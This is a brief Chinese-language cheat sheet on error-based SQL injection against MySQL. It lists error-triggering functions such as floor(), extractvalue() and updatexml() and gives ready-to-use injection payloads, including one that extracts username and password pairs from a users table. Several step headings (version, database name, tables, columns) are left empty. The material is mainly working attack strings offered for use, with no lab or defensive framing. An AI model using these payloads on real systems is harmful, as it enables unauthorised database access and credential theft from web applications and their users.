报错注入

什么时候用

页面没有回显示

常用的报错函数

1.floor()
union select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a) b

2.extractvalue()
and (extractvalue(1,concat(0x7e,(select user()),0x7e)))

3.updatexml()
and (select updatexml(1,concat(0x7e,(select user()),0x7e),1))

4.geometrycollection()

5.multipoint()

6.polygon()

7.multipolygon()

8.linestring()

9.multinestring()

10.exp()

以extractvalue()为例的注入

1.版本信息

2.数据库名

3.获取表名

4.列名

5.获取数据
1234' and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e))#
不能使用此语句从查询是因为，update里不能将正在使用表的数据更新到这个表里